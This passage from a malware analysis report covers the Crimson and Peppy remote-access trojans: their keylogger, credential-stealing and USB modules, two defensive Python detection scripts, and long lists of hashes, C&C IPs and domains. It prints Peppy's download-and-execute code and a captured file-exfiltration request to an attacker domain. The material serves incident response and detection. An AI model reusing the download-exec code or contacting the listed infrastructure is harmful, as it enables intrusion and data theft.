uclntn             Sets RegKey: [variable]_ver to provided value, possibly used as a version indicator
udlt               Download “remvUser” payload from C&C, save as msupdate.exe, then execute it
uklog              Download keylogger payload from C&C, save as win_services.exe then add to startup via registry
update             Download controller/client/main RAT, save as servicesdefender.exe, then execute it
updatu or usbwrm   Download USB payload, save as udriver.exe then add to startup via registry



MSIL/Crimson Module Analysis 

As previously mentioned (and shown in the commands table), Crimson relies on additional module payloads to further enrich its feature set. These modules include keylogging, browser credential theft, automatic searching and stealing of files on removable drives, and two different payload update modules. Lastly, there appears to be a module referred to as “remvUser” that we have not been able to locate.

URLDownload 

When executed, this module first checks for the existence of a registry key: HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\last_edate. If the key does not exist, the module creates it and assigns it a DateTime.Now string. This key is periodically checked to determine how many days have passed. Once the malware detects that at least 15 days have passed, an HTTP GET request is sent to a hardcoded location to retrieve a text file that should point to another HTTP location containing a final payload. For example, one analyzed sample (md5: 532013750ee3caac93a9972103761233) contained a hardcoded URL: hxxp://sahirlodhi[.]com/usr/api.txt. So far we have observed the attackers modify api.txt twice, first containing a link to hxxp://bbmsync2727[.]com/upd/secure_scan.exe and then hxxp://bbmsync2727[.]com/ccmb/ssm.exe.

In the module that we analyzed, the downloader logic was configured to request a file from the hardcoded URL hxxp://sahirlodhi[.]com/usr/api.txt, which is likely a compromised website. The module expects another URL to be stored at the retrieved location, which we initially found to be hxxp://bbmsync2727[.]com/upd/secure_scan.exe (md5: e456d6035e41962a4e49345b00393dcd). This payload is an MSIL/Crimson Downloader variant that, when executed, begins the MSIL/Crimson lifecycle all over again by downloading a new controller/orchestrator.


secApp 

The secApp that we analyzed (md5: ccfd8c384558c5a1e09350941faa08ab) contained functionality very similar to the initial downloader; however, the initial beacon sent to the C&C was doupdat rather than update, and the module was configured to connect to the same hardcoded C&C but on a different port. In addition to supporting the update command issued by the C&C, this module also supports the following commands: info, upsecs, and upmain. The info command provides the same functionality as in the main RAT module, while upsecs and upmain allow the controller to modify the path and application names for both the secApp and mainApp.


Credential Stealer 

The pssApp is a password harvesting module that initially appears to support retrieving saved credentials from the Chrome, Firefox, and Opera browsers. Successfully harvested credentials are stored in a hardcoded location such as %APPDATA%\Roaming\chrome\chrome_update. If no credentials are found, the credential log will simply contain “Not Found> > <”, while an example of successfully stolen credentials is shown in Figure 28. In our very limited testing, this module was not able to retrieve passwords from Opera 35.0.2066.68 or Firefox 44.0.2 but was successful with Chrome 48.0.2564.116 m.


Figure 28: Successfully harvested credentials by the pssApp module (the chrome_update log opened in Notepad, showing an ftp:// URL followed by the harvested username and password)

Some samples (md5: 8a991eec65bd90f12450ee9dac0f286a) also appear to support the retrieval of credentials from Windows Live, FileZilla, Vitalwerks’ Dynamic Update Client (DUC), and Paltalk.


Keylogger 

The keylogger module is a basic keylogger that stores keylogs in a plain text file (Fig. 29) in a hardcoded location. The module that we analyzed (md5: f18172d7bb8b98246cb3dbb0e9144731) was hardcoded to store keylogs in a file named “nvidia” in the following location: %APPDATA%\NVIDIA\.

Figure 29: Data stored in “nvidia” keylog (plain-text keystrokes opened in Notepad)
USB Module

If either the updatu or usbwrm command is issued, a USB drive module may be downloaded and set to execute on next startup. In the payload that we analyzed, the purpose only appears to be to search for potentially interesting files on removable storage and copy them to the local disk, likely so they may be exfiltrated at a later time. This payload may be configured with a set of file extensions (Fig. 30) that are used to search for matching files on any USB drives. If any files are found, they are copied to a configured directory on the local disk, while a running list of copied files is stored in a separate log so that duplicate files are not copied. The anti-duplication method, however, only uses filenames, so if an already copied file is later modified, the newer copy will not be saved for exfiltration. Although the name of one of the commands that may be used to download this payload (usbwrm) suggests that the payload contains “worm” functionality, that does not appear to be the case.


remvUser 

During our research, we were not able to locate this module, so we are not sure what its functionality is. A best guess is that it could be a clean-up/implant removal utility.
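The module analysis above names several host artifacts a responder can look for: the URLDownload dormancy key (last_edate), the keylogger's “nvidia” log, the pssApp chrome_update log, and the binary names the update commands write and register for startup. The following Python script is an added example (not tooling from the report) that checks a file listing and a .reg export for those artifacts. It assumes that last_edate holds an en-US DateTime.Now string ("M/d/yyyy h:mm:ss tt") and that the startup persistence lives under a ...\CurrentVersion\Run or RunOnce key; the report names neither the date format nor the exact key, so both are assumptions, and the sample paths and registry export are constructed.

```python
"""Host triage helpers for the MSIL/Crimson module artifacts described above.

Added example, not code from the report. Assumptions: last_edate is stored as
an en-US DateTime.Now.ToString() ("M/d/yyyy h:mm:ss tt"), and startup
persistence is a value under a ...\CurrentVersion\Run or RunOnce key.
"""
import re
from datetime import datetime, timedelta
from typing import Dict, Iterable, List, Optional, Tuple

# Path suffixes taken from the module analysis and Table 1. Labels are ours.
ARTIFACTS: Dict[str, str] = {
    r"\nvidia\nvidia": "keylogger log",
    r"\chrome\chrome_update": "pssApp credential log",
    r"\win_services.exe": "keylogger module (uklog)",
    r"\udriver.exe": "USB module (updatu/usbwrm)",
    r"\dotnetframwork.exe": "URLDownload module (dotnet)",
    r"\servicesdefender.exe": "main RAT (update)",
    r"\msupdate.exe": "remvUser payload (udlt)",
}

LAST_EDATE_SECTION = r"hkey_current_user\software\microsoft\windows\currentversion"
DATE_FMT = "%m/%d/%Y %I:%M:%S %p"   # assumed DateTime.Now string format
DELAY = timedelta(days=15)           # dormancy period from the analysis
VALUE_RE = re.compile(r'^"([^"]+)"="(.*)"$')


def find_artifacts(paths: Iterable[str]) -> List[Tuple[str, str]]:
    """Return (path, label) for every path ending in a known artifact suffix."""
    hits = []
    for path in paths:
        norm = path.lower().replace("/", "\\")
        for suffix, label in ARTIFACTS.items():
            if norm.endswith(suffix):
                hits.append((path, label))
                break
    return hits


def _reg_values(reg_export: str):
    """Yield (section, name, data) for every string value in a .reg export."""
    section = ""
    for line in reg_export.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].lower()
            continue
        m = VALUE_RE.match(line)
        if m:
            # .reg files escape backslashes in string data as "\\"
            yield section, m.group(1), m.group(2).replace("\\\\", "\\")


def urldownload_timer(reg_export: str, now: datetime) -> Optional[dict]:
    """Recover the URLDownload dormancy timer from the last_edate value."""
    for section, name, data in _reg_values(reg_export):
        if section == LAST_EDATE_SECTION and name.lower() == "last_edate":
            installed = datetime.strptime(data, DATE_FMT)
            fires_at = installed + DELAY
            return {"installed": installed, "fires_at": fires_at,
                    "delay_elapsed": now >= fires_at}
    return None


def find_run_entries(reg_export: str) -> List[Tuple[str, str, str]]:
    """Return (value name, command, label) for Run/RunOnce values launching a known binary."""
    hits = []
    for section, name, data in _reg_values(reg_export):
        if not (section.endswith(r"\run") or section.endswith(r"\runonce")):
            continue
        for suffix, label in ARTIFACTS.items():
            if data.lower().endswith(suffix):
                hits.append((name, data, label))
                break
    return hits


# Constructed sample inputs (not taken from a real host).
SAMPLE_PATHS = [
    r"C:\Users\alice\AppData\Roaming\NVIDIA\nvidia",
    r"C:\Users\alice\AppData\Roaming\chrome\chrome_update",
    r"C:\Users\alice\AppData\Roaming\udriver.exe",
    r"C:\Windows\System32\drivers\nvidia.sys",
    r"C:\Program Files\NVIDIA Corporation\nvidia.txt",
]

SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion]
"last_edate"="2/11/2016 3:04:05 PM"

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"dotnetframwork"="C:\\Users\\alice\\AppData\\Roaming\\dotnetframwork.exe"
"OneDrive"="C:\\Users\\alice\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe"
"""

if __name__ == "__main__":
    print(find_artifacts(SAMPLE_PATHS))
    print(urldownload_timer(SAMPLE_REG, datetime(2016, 2, 27)))
    print(find_run_entries(SAMPLE_REG))
```

The dormancy calculation is the useful part for scoping: on a host where last_edate exists but the 15 days have not elapsed, the URLDownload module has not yet fetched api.txt, so the absence of traffic to sahirlodhi[.]com in proxy logs says nothing about whether the module is present.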


Python/Peppy 

Peppy is a Python-based RAT; most of its appearances have similarities with, or definite overlap with, MSIL/Crimson appearances. Peppy communicates with its C&C over HTTP and uses SQLite for much of its internal functionality and for tracking exfiltrated files. The primary purpose of Peppy may be the automated exfiltration of potentially interesting files and keylogs. Once Peppy successfully communicates with its C&C, keylogging and the exfiltration of files matching configurable search parameters begin (Fig. 30). Files are exfiltrated using HTTP POST requests (Fig. 31).


SYNCRULESCONFIG = {'HOME': r(" '*.pdf' or '*.txt' or '*.doc*' or '*.xls*' or '*.ppt*' or '*.mdb*' or '*.dwg' or '*.dxf' or '*.dbx' "),
                   'FIXED': r(" '*.pdf' or '*.doc*' or '*.xls*' or '*.ppt*' or '*.mdb*' or '*.dwg' or '*.dbx' "),
                   'REMOVABLE': r(" size < 5 mb if ('*.jpg' or '*.jpeg' or '*.avi') else (size < 100 mb and ('*.pdf' or '*.txt' or '*.doc*' or '*.xls*' or '*.ppt*' or '*.mdb*' or '*.dwg' or '*.dxf')) ")}

Figure 30: Peppy configurable search parameters

POST /0.1/files.php/C/Documents%20and%20Settings HTTP/1.1
Accept-Encoding: identity
Username: 
Content-Length: 5942
AuthToken: 
Connection: close
User-Agent: Python-urllib/2.6
Host: mvssync8767.com
Content-Type: multipart/form-data; boundary=74925276adfe49c4a0267510b612a232

--74925276adfe49c4a0267510b612a232
Content-Disposition: form-data; name=" filename="C:\\Documents and Settings
Content-Type: text/plain

Figure 31: Peppy exfiltrating files (Wireshark “Follow TCP Stream” view, tcp.stream eq 8)
In addition to keylogging and the exfiltration of files, Peppy is also capable of accepting commands from its C&C to update itself, disable itself, exfiltrate a specific file, uninstall itself, execute a shell command, take screenshots, spawn a reverse shell, and download a remote file and execute it.
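The exfiltration request in Figure 31 carries several traits a proxy or IDS analyst can key on: a POST to /0.1/files.php/ with the source path appended, empty Username and AuthToken headers, a Python-urllib/2.6 user agent, a multipart upload, and a Host from the Peppy domain list in the appendix. The following Python is an added example (not tooling from the report) that parses a captured request and scores those traits together, since the user agent alone is common to any Python 2 script. The headers of the sample request are modelled on Figure 31; the form field name, uploaded file name and the benign request are constructed.

```python
"""Detection of Peppy file exfiltration in captured HTTP requests (Figure 31).

Added example, not code from the report. Indicators come from the request in
Figure 31 and the Peppy domain list in the appendix; the sample requests are
constructed (form field name and file name invented).
"""
from typing import Dict, List, Tuple

# Subset of the Peppy RAT domains listed in the appendix.
PEPPY_DOMAINS = {"mvssync8767.com", "bbmsync2727.com", "kssync3343.com",
                 "bluesync2121.com", "avssync3357.com"}


def parse_request(raw: str) -> Tuple[str, str, Dict[str, str], str]:
    """Split a raw HTTP request into (method, path, headers, body)."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    lines = head.split("\n")
    method, path, _version = lines[0].split(" ", 2)
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body


def peppy_indicators(raw: str) -> List[str]:
    """Return the Peppy traits a request exhibits; each is weak on its own."""
    method, path, headers, body = parse_request(raw)
    hits = []
    if headers.get("user-agent", "").startswith("Python-urllib/2."):
        hits.append("python-urllib/2.x user agent")
    if method == "POST" and path.startswith("/0.1/files.php/"):
        hits.append("files.php upload path with source path appended")
    if "username" in headers and "authtoken" in headers:
        hits.append("Username and AuthToken headers")
    if headers.get("host", "").lower() in PEPPY_DOMAINS:
        hits.append("known Peppy domain")
    if "multipart/form-data" in headers.get("content-type", "") and "filename=" in body:
        hits.append("multipart file upload")
    return hits


def is_peppy_exfil(raw: str, threshold: int = 3) -> bool:
    """Flag a request only when several independent traits coincide."""
    return len(peppy_indicators(raw)) >= threshold


# Constructed request with the header set seen in Figure 31.
SAMPLE_PEPPY_POST = (
    "POST /0.1/files.php/C/Documents%20and%20Settings HTTP/1.1\r\n"
    "Accept-Encoding: identity\r\n"
    "Username: \r\n"
    "Content-Length: 5942\r\n"
    "AuthToken: \r\n"
    "Connection: close\r\n"
    "User-Agent: Python-urllib/2.6\r\n"
    "Host: mvssync8767.com\r\n"
    "Content-Type: multipart/form-data; boundary=74925276adfe49c4a0267510b612a232\r\n"
    "\r\n"
    "--74925276adfe49c4a0267510b612a232\r\n"
    'Content-Disposition: form-data; name="file"; filename="C:\\\\Documents and Settings\\\\notes.txt"\r\n'
    "Content-Type: text/plain\r\n"
    "\r\n"
    "constructed file contents\r\n"
)

# Constructed benign request from the same urllib version (a plain download).
BENIGN_GET = (
    "GET /updates/manifest.json HTTP/1.1\r\n"
    "Host: updates.example.com\r\n"
    "User-Agent: Python-urllib/2.6\r\n"
    "\r\n"
)

if __name__ == "__main__":
    for name, req in (("peppy", SAMPLE_PEPPY_POST), ("benign", BENIGN_GET)):
        print(name, is_peppy_exfil(req), peppy_indicators(req))
```

The threshold keeps the urllib user agent from generating alerts on its own; the path shape and the empty Username/AuthToken headers are the traits that distinguish Peppy's uploader from ordinary scripted HTTP traffic.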

In addition, we have discovered a simple Python-based downloader (md5: 82719f0f6237d3efb9dd67d95f842013) that 
was possibly written by the author(s) of Peppy based on code overlap between the downloader’s functionality and 
Peppy’s download_exec routine (Fig. 32, 33). 


class MyURLOpener(urllib.FancyURLopener):
    def http_error_default(self, url, fp, errcode, errmsg, headers):
        Exception(errmsg)

def downloadexec(url):
    locfile = os.path.join(APPDATA, "btc.exe")
    MyURLOpener().retrieve(url, locfile)
    os.startfile(locfile)

Figure 32: Python downloader code


class MyURLOpener(urllib.FancyURLopener):
    def http_error_default(self, url, fp, errcode, errmsg, headers):
        Exception(errmsg)

def download_exec(conn, db, job_id, url):
    locfile = os.path.join(APPDATA, '%d.exe' % random.randrange(1000, 9999))
    MyURLOpener().retrieve(url, locfile)
    os.startfile(locfile)

Figure 33: Peppy download_exec routine and MyURLOpener class


Conclusion 

As we described, there are clearly a number of common threads throughout these attacks. We have been able to 
connect campaigns, vectors, payloads, and, in some cases, infrastructure, but additional details continue to emerge. 
In the short term, this serves as an important reminder that wars are no longer waged solely on the ground or in the 
air. Rather, threat actors (whether from nation-states or private parties with interests in international conflicts) will use a 
variety of cyber tools to achieve their goals. 






Appendix 

Cluster 1 IOCs

Crimson Downloader Samples
032bacaea0d335daec271f228db6bc88
052eb62056794a08a04f4cd61455602c
06c18c72f9f136bacc5c9b0d8fa93195
0a8d414eb910eb4caeb96a648b70eef3
0b651ef0eb7b919e91a2c5c5dbccd27e
0ed7f485166796e10bcb9123de24d211
17dbd878985b78848d4a3a758a3ef89c
1af4df1382c04677050379ccdafcafd2
21fc043b31d22b5c3f5529db83e90422
2c9cc5a8569ab7d06bb8f8d7cf7dc03a
340f31a36e159e58595a375b8b0b37b2
34ad98510d4d6e24b7e38f27a24ad9f6
3a67ebcab5dc3563dc161fdc3c7fb161
3b08095786731c522f5649081f8dbb7e
3cc848432e0ebe25e4f19effdd92d9c2
41a0e4f9745e4bd5ad7b9d500deb76fa
428371be27fc057baac3ea81a8643435
535888163707b60c1a8dfefffad70635
53c10ac66763739b95ac7192a9f489ad
5b6beb9ee6e604f4e474b8129e6135f4
5c6b401979469040b39babb0469fc0c8
5d038817ffeab7715415d68d438af345
5ff65fdefe144800e43a2f6cc6244c75
6c3b38bf90a203b2f7542d0359b8e60e
6d2442494c3019f1597256cbeb45e5f6
6eb40b2e6a67a785d5cc6e4ad9102b5d
7289c160582f010a3c7dbd512c5d8a09
75b390dc72751a062e8106328450ef87
796ae0b75c0e0b08ea84668495df4070
7a6b88e43cccc8133c066b87f72c53f7
803d2758c3b89882e2d41867768d7b15
83a8ce707e625e977d54408ca747fa29
85e2c950ddb18fe1dd18709cfbb9b203
94770186027a0ccdf733b72894a0c7d0
9d4504cdb7b02b9c9fffefcf9b79101d
ac637313520ca159a02d674474d341ef
b67411da3ddfcae9f2a20935619e5c4a
b8098acf09d121ab298351f0c804ef8b
bf1400105c97a28fefd33d8c0df5d4c1
c61061a40dba411b839fe631299c267a
ca27cefe404821ccd8dc695da55102e8
cdc6bb98a2629338d49587d186562fd3
dac4f8ba3190cfa1f813e79864a73fe1
df6b3946d1064f37d1b99f7bfae51203
e3254ad0275370f92cffeacbf603a905
e456d6035e41962a4e49345b00393dcd
edccbc7f880233de987ba4e917877df2
eee91d8de7ea7c0ac3372f65c43e916a

Crimson Downloader Droppers
9e0fef5552100a7e0a2d044b63736fb2
7470757050f584101a851d7ba105db31

Crimson SecApp Samples
07defabf004c891ae836de91260e6c82
0ad849121b4656a239e85379948e5f5d
0ed7f485166796e10bcb9123de24d211
1911c1234cc2918273baeffd7d37392e
2d6d0dbd8ac7c941d78ba14289a7ab9d
43b39b40605afb9d2624f1cede6b48a8
65f6143d69cb1246a117a704e9f07fdc
723d85f905588f092edf8691c1095fdb
765f0556ed4db467291d48e7d3c24b3b
9b3cb979b1397a4a13ea62dbf46510d8
9fcc3e18b9c0bd7380325f24a4623439
b4080cda4fb1b27c727d546c8529909c
ca77af41cbd8c2fd44085d0d61bac64b
df6be8accc487bf63260aacf5e582fe2

Crimson RAT Samples
073889fe855f401c3c4cc548bc08c502
0964887f6f709f9c3f11701412acb9c1
14be26aa207cff81ff814c8a7a8e2f03
19b9f62f29f3689b1db4c56deed7e162
1a1426a94e37e5f3c14cd2b6740e27e1
3ff165ee68d1bc03ae7d4d3baf99b963
4297041e3a701ed8c01e40d6c54264a1
43f47d2045ca98265fd4bd4011a04932
463565ec38e4d790a89eb592435820e3
5371d2984cbd1ae8283f9ae9eeee718d
53a60acc6a09a7fa2eebf4eb88c81af5
59e0fc469d1af7532507c19b47f19960
6746c430f978d0bc9bbecff87c651fa2
71b4bbddf46e1990210742a406c490bf
7e42de66eee8d280a3ba49d5b979c737
811eb99fb1aca98052db4b78c288889c
819715180810caaaa969c816eb2b7491
8317bb3d192c4495507a5945f27705af
8c713cffdc599930a9236c2d0d0ee91a
92f78a182faf26550d6fab2d9ec0692d
943f35200dce22766d0c2906d25be187
94d29dded4dfd920fc4153f18e82fc6c
9fd2838421b28674783b03eb46f4320f
a3aa3a12d81c9862b18f83a77d7215ca
bcbac2241977c976aec01592fb514aa4
c2bc8bc9ff7a34f14403222e58963507
cb0768c89e83f2328952ba51e4d4b7f1
d53de7c980eb34f9369e342d5d235c9b
e7803020e9697d77f165babecf20ea82
eaee83a376914616924eab9b4b96b050
ed1daf18ef09fb2a5c58ab89824ecab0
f078b5aeaf73831361ecd96a069c9f50
fe955b4bbe3b6aa2a1d8ebf6ee7c5c42

Crimson C&C
5.189.143[.]225
5.189.167[.]65
80.241.221[.]109
93.104.213[.]217
193.37.152[.]28
213.136.87[.]122

Peppy RAT Samples
010a50145563a6c554de12b8770f16f7
010aa8d6e6f5346118546b1e4e414cb2
131b4ed3df80e2f794a3e353e2c7f8fb
17d22686bfc825d9369a0751c4cc6a22
1d49dc6af6803d9ffc59a859315b2ac4
22192141d2010fe9fed871d05573dda4
23ec916b3eae3f88853bde8081be870f
2463d1ff1166e845e52a0c580fd3cb7d
2cff1578ac42cc0cd5f59e28d6e7240f
31a9e46ff607b842b8fff4a0644cc0f4
3540f2771b2661ecbd03933c227fb7f7
3b979fd0a8fa0ecbc334a3bbbfb68a36
4a717b657ea475197d967008c7db8353
511bcd411ec79c6ca555670e98709e46
5998641f454f82b738977aa8b3d1d283
725379749d3fa793edcce12291782134
77c7c0117a0e457d7e3ceef4ab82c2ca
7920862303764a55050d2da38b8bf4db
858a729819cc082f2762b6d488284c19
86e27e86e64031720a1ca52d2fbb7c98
af5e96e260b71356d62900551f68f338
b04117ee18182c1c07ffaf6fb35b08bc
c33c79c437d94fad3476f78361df0f24
c9e4c816b4ef23c28992e0e894b9c822
ee5a460ded205d2074a23e387c377840
f13a1a0cbcd5e13dd00dbc77c35973ef
f6d141f45e76cefcb712f69c193b3ac1
f8955450fbd62cb4461c725d8985ff60
fa97cba6a52896e1f2146957a6eec04f
fab5eff5fc65a7a2c5920586df5e29c2


Peppy RAT Domains
applemedia1218.com
avssync3357.com
bbmdroid.com
bbmsync2727.com
bluesync2121.com
eastmedia1221.com
eastmedia3347.co.cc
eastmedia3347.com
facemedia.co.cc
kssync3343.com
kssync3347.co.cc
kssync3347.com
mahee.kssync3343.co.cc
mvssync8767.com
student3347.mooo.com
winupdater2112.com

Andromeda Samples
0123411a6cfe8afb4a45e4afeed767e7
114551a87fa332a243fc05b7246309b9
128c0ccc1252098bc2314d88f4e70044
133e0c441ea744951080d700604a63ee
1f97ddaea7ac0c4e20b2db75969b4545
4b0481a591c87e8542e2089396a10d3c
7ec3ec88185f9c235e2d3da7434b928a
878aa68245675ca5ea677aaf28707b7a
990c3b67061109d82627a5642bf1bb68
a4ce604f8d3ac2e5facdae3c63ef4dc6
a6d75b57bd597e723335f96f074f5700
a6ef041311497bcddb8818b5a4f6c90e
ae2ef98a91c70dc43979ce7df8e475ad
aec91b4453a1b321e302127bc9f21a7c
f0e64d2b011223ece668c595406f1abc
f4123e7f09961479452f0f42b3706293
fb2cb45bf53cef41674da2d9a4bdba32


Andromeda Domains
dvdonlinestore.net
eastmedia2112.com
mustache-styles.com
onlinestoreonsale.com
pradahandbagsshoes.com
vhideip.com
wisheshub.com
99mesotheliomalawyers.com


Various Downloader Samples
2ba1e2a63129517055ab3a63cb089e33
4131776ae573bdb25009a343cf1541f5
44fe2f4dd8b001bbcc4de737128095ca
63ee06dae035981c5aea04f5a52879c1
643e30e665124eea94a22641f79a9c91
67bad4ad3d9a06fc20bea8c3ebb7ad01
7e97efc85be451432388b9f1ce623400
861f621fdf2d3e760df50009fe2824ae
a957e3a7aed4efd1b214d3c3b79f5874
c16b43a5897861fbe023e4b7d340f2e8
dbd5c44e6c189f289e0eea1454897b26
e26150f5186bb7230d85f4cf3aa45d17

Python Downloader Sample
82719f0f6237d3efb9dd67d95f842013

Meterpreter Samples
04e8404f1173037ba4e11241b141d91d
c411ee81c34e14a1ace7e72bea2e8d12
d30c6df94922323041f8036365abbfd2


Meterpreter C&C 
5.199.170[.]149 


njRAT Sample
27ca136850214234bcdca765dfaed79f

njRAT C&C
5.189.145[.]248

Malicious Documents
0197ff119e1724a1ffbf33df14411001
18711f1db99f6a6f73f8ab64f563accc
1f82e509371c1c29b40b865ba77d091a
278fd26be39a06d5e19c5e7fd7d3dcc2
3966f669a6af4278869b9cce0f2d9279
438031b9d79a17b776b7397e989dd073
68773f362d5ab4897d4ca217a9f53975
76f410c27d97e6c0403df274bebd5f6e
98bdcd97cd536ff6bcb2d39d9a097319


Unknown, likely related
0437655995f4d3104989fb963aa41339
c0ff05a6bf05465adfc9a1dfd5305bde

Unknown C&C
5.189.137[.]8

Luminosity Link Sample
708a1af68d532df35c34f7088b8e798f

Luminosity Link C&C
5.189.145[.]248

Bezigate Samples
236e7451cbce959ca0f62fb3b499b54e
44db769fb1f29a32d5c1998e29b4b7c4
85d182f7a0e049169a7bd0aa796fba96
96dbed32a59b50e6100f1ca35ef5a698
e49edc719eaab11a40158c15c9dd9b7b

Bezigate C&C
107.167.93[.]197
62.4.23[.]46
ad2.admart[.]tv
winupdatess.no-ip[.]biz

DarkComet Samples
0aecd3b79d72cbfa8f5dce2a12e76053
278f889f494d62e214406c4fcfa6f9a3
fd5a419924a0816c6357b47f4e375732

DarkComet C&C
ad2.admart[.]tv
107.167.93[.]197

Intribune.blogspot[.]com Links
hxxp://intribune.blogspot[.]com/2015/11/4-sikh-army-officers-being-trialed-in.html
hxxp://intribune.blogspot[.]com/2015/11/seventh-pay-commission-recommends.html
hxxp://bbmsync2727[.]com/cu/seventh%20pay%20commission%20salary%20calculator.xls
hxxp://intribune.blogspot[.]com/2015/11/army-air-defenceengineers-and-signal-to.html
hxxp://intribune[.]blogspot[.]com/2015/09/sc-seeks-army-response-on-batch-parity.html
hxxp://intribune[.]blogspot[.]com/2015/05/seniors-juniors-and-coursemates-please.html
hxxp://intribune[.]blogspot[.]com/2015/07/awho-defence-and-para-military-forces.html

attachment.biz Links
hxxp://ceengrmes[.]attachment[.]biz/?att=1450603943
hxxp://comdtoscc[.]attachment[.]biz/?att=1451926252
hxxp://comdtoscc[.]attachment[.]biz/?att=1453788170
hxxp://fileshare[.]attachment[.]biz/?att=1455255900
hxxp://fileshare[.]attachment[.]biz/?att=1455264091

Cluster 2 IOCs

Crimson SecApp Samples
ccfd8c384558c5a1e09350941faa08ab
167d632eea9bd1b6cac00a69b431a5c0
e3e4ced9b000aa47a449f186c7604ac8
79f7e1d6389c73a7e2525d0ec8fa3ce2
0a7a15180053270e25a220a3e38e7949
17495ce3d11e9cddf5a98ec34ee91d6a
148403235614461c1f088d524fbd9fd0
b67047e341653a01526cc178966d1f6c
ef0ab9f731e7c980b163c7e1b5db9746
3739bbf831d04e8a2b06275cd3af371d
0d7846a76675be378a50667767d0e35a
4f9b754da90bed9a633130d893d65c4e
3e91836b89b6d6249741dc8ee0d2895a
85429d5f2745d813e53b28d3d953d1cd

Crimson RAT Samples
870c0312cea7b3b6b82be01633b071cd
a74165ec1d55b682ed232ffde62b3b11
8336d9aeccee3408a4f9fbf4b1a42bac
2dfe4468a052a07cab117a20e182adc9

Crimson C&C
178.238.228[.]113

Beendoor Downloader
950eb314435bdb3c46c9f0954c935287

Beendoor Sample
d3094c89cad5f8d1ea5f0a7f23f0a2b1

Beendoor C&C
178.238.235[.]143


Cluster 3 IOCs

Crimson RAT Samples
51c57b0366d0b71acf05b4df0afef52f
438f3ea41587e9891484dad233d6faa6
71cd70b289c53567579f8f6033d8191b
d8637bdbcfc9112fcb1f0167b398e771
12929730cd95c6cf50dd3d470dd5f347
7ccc752b5956b86b966d15a6a4cf6df0
b2ed9415d7cf9bc06f8ccb8cfdba1ad6
cedb0fc3dfbb748fdcbb3eae9eb0a3f1
95cba4805f980e8c1df180b660e2abb4

Crimson C&C
88.150.227.71

Cluster 4 IOCs

Crimson Downloader Sample
5d9b42853ecf3ff28d4e4313276b21ed

Crimson RAT Samples
90b07bc12b45f2eb1b0305949f2cec25
3e7c2791ff7bc14ef30bba74954ef1e2
44145124e046804bf579c8839b63a9a7
a73494ca564f6404488a985cefd96f56
8a0db32b97be106d2834739ffd65715b
ddb66b231ab63c65a8ce139e73652aec

Crimson C&C
bhai123.no-ip[.]biz
bhai1.ddns[.]net
sudhir71nda.no-ip[.]org
119.154.134[.]211
119.154.209[.]175
119.154.220[.]96
119.157.163[.]145
119.157.229[.]245
182.181.239[.]4

Unclustered Crimson Samples

Crimson Downloader Samples
6a1c037c66184aa39096933f75d2d8ca
99d93e0c6bf9cf9acb92580686f6b743
af071cd2420057090cfe33fefa139d01
8c30ed1bc13feaa8e937be0f6a739be4
adf657337d7fa7fa07c72b12fb880e41
e2d1309893c0de5a026a2ae9e8ada486
d0152f228e934dcafa866445c08e3242
9b674985a412c4c07d52c7482c2ed286
c3af6b938988a88ea2dc2e59f8418062
2d58826fbff197918caa805aeed86059
ab6b6f675e48d818044c5e66d05813ce
4b1a627c43d4e0af504bf20023e74f6b
75798547f0ddca076070bcea67a0b064
0255f73a32bf781c786d19d149ddfb90
16eb146eee147a333ef82d39266d5cfb
2507f545a2d6e52ade2d7708d9ce89d1
f9798f171194ee4fec5334ded3d786e7
9b77eb38e32d43a97c5bde5ec829c5ca
2eea994efa88e0a612e82ee3e08e78f1

Crimson SecApp Samples
c303a6ac44e3c59a9c3613ac9f92373b
92d6366d692a1b3691dce1379bb7b5aa
eb01bbfe8ca7e8f59aab475ad1f18245
4d7ad9ab4c1d40365da60d4f2f195db4
f936afdd0b69d109215d295ab864d309
ec4bef2233002d8fe568428d16e610b1
045c4b69d907833729fd83d937669f66
522178a60b030bbab910cb86cfeaff20
1ab5f55763663ffb0807079397812b47
73b878e56f790dccf08bd2344b4031c8
f0f6544ddb26c55df2d6184f433d8c17
7c23f984170fd793cfde5fd68535d0a8
7e50c67f1e94b154f110d5d73e2f312c
1bedd50f4ae757c6009acbe7da021122
ae9659a2c08e2cb9ab9e5cdcb8ab4036
0991033c2414b4992c1b5ab21c5a47e2
f710e3ad19a682dab374c167c7c2796a

Crimson RAT Samples
214eb28f04d969c9f637b09e4ffad644
29097319b60c103421437214d5a3297e
38ce32cb94092cc6790030abcc9a638b
439ba84a964a17ce2c3d51ac49c68f81
4e9b81e70227575f2d2a6dd941540afa
5b4361e6a6117e9f7189a564f46157d7
5dbeb8475e22a938415eb43e6bd24fe8
6409930f39cd6c17fb68f7fee47b1cdf
82377fcf288e9db675ab24cbf76ea032
84c30675b5db34c407b98ea73c5e7e96
897fc3a65f84e1c3db932965a574d982
9e73d275202b02b3f0ed23951fda30da
b0327f155ebaba23102f72c1100fa26b
b05730eda99a9160cc3f8dec66e9f347
b467df662af8a1fbafa845c894d917e3
c0bf5a0f535380edec9b42a3cebb84c4
ca48224adce9609dc07e50930dd1afae
dac44b9d5a8494a3293088c9678754bc
e0217714f3a03fae4cdf4b5120213c38
e66203177a03743a6361a7b3e668b6a6
f05834a930f6fda6b877011c3fb3ef18
f1a2caf0dd7922ea3a64231fd5af7715

Crimson C&C
5.189.131[.]67
5.189.152[.]147
5.189.167[.]220
5.189.167[.]23
79.143.181[.]21
79.143.188[.]166
193.164.131[.]58
213.136.69[.]224
213.136.73[.]122
213.136.84[.]43

MSIL/Crimson Modules

Keylogger
f18172d7bb8b98246cb3dbb0e9144731
b55a7da332bed90e798313b968ce7819
c0eb694960d0a7316264ced4d44b3abb
292f468f98e322795d1185c2b15c1f62
b6263f987fdec3fb3877845c8d5479dd
127ee83854f47628984ab47de725ee2f
2fa82dd2490fc697bb0bb0f8feb0dd85
bc6d139a3d630ba829337687b9328caf
f3c8630d06e51e8f76aa1fb438371d21
3a64e2d3558a28c4fdb0f076fa09e1a1
370bb0ec1c16bd8821f7e53f6bfc61e3

Infostealer
